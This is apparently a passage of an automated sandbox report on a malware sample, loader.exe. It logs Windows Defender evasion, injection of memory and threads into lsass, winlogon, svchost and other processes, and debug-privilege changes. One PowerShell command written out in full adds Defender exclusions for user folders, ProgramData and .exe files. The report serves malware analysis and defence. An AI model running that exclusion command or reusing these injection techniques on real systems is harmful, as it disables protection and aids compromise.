        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDFDCE0 FindFirstFileExW,30_2_000002BAAEDFDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879CDCE0 FindFirstFileExW,45_2_0000026A879CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537ADCE0 FindFirstFileExW,46_2_00000179537ADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D56DCE0 FindFirstFileExW,47_2_000002295D56DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E6DCE0 FindFirstFileExW,50_2_0000025306E6DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3CDCE0 FindFirstFileExW,51_2_000001845B3CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD4DCE0 FindFirstFileExW,53_2_000001ADECD4DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55907DCE0 FindFirstFileExW,54_2_000001D55907DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EADCE0 FindFirstFileExW,55_2_00000241A9EADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD7319DCE0 FindFirstFileExW,56_2_000001CD7319DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E89DCE0 FindFirstFileExW,57_2_000002824E89DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B3DCE0 FindFirstFileExW,58_2_0000021B47B3DCE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_11-413
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_39-477
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_43-91
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000225DC647D90
        Source: C:\Windows\System32\dialer.exeCode function: 43_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,43_2_00000001408460F0
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,11_2_00000001400017EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000225DC647D90
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000225DC64D2A4
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000225DC6A7D90
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000225DC6AD2A4
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00000202C0AED2A4
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00000202C0AE7D90
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002A66130D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A661307D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002A661307D90
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDF7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAAEDF7D90
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDFD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000002BAAEDFD2A4
        Source: C:\Windows\System32\dialer.exeCode function: 42_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,42_2_0000000140001160
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0000026A879CD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0000026A879C7D90
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00000179537A7D90
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00000179537AD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D56D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000002295D56D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D567D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000002295D567D90
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_0000025306E6D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_0000025306E67D90
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001845B3CD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_000001845B3C7D90
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001ADECD47D90
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_000001ADECD4D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55907D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_000001D55907D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D559077D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_000001D559077D90
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00000241A9EAD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_00000241A9EA7D90
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD7319D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001CD7319D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD73197D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001CD73197D90
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E897D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002824E897D90
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E89D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002824E89D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B3D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000021B47B3D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B37D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000021B47B37D90

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Adds a directory exclusion to Windows Defender
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Allocates memory in foreign processes
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAED90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B370000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108B940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166910000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 8740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 265CF960000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 223DA540000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22638E00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1EC097C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1CFE9AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 250FB0F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23523E30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B5CB5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E53D990000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAF9E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DD840000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DDE20000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject code into remote processes
        Source: C:\Windows\System32\dialer.exeCode function: 11_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,11_2_0000000140001C88
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC61273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC67273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0B1273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6133273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEDC273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8799273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5377273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D53273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B37273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5904273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E7273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 7316273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E86273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 645B273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273CJump to behavior
        Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273CJump to behavior
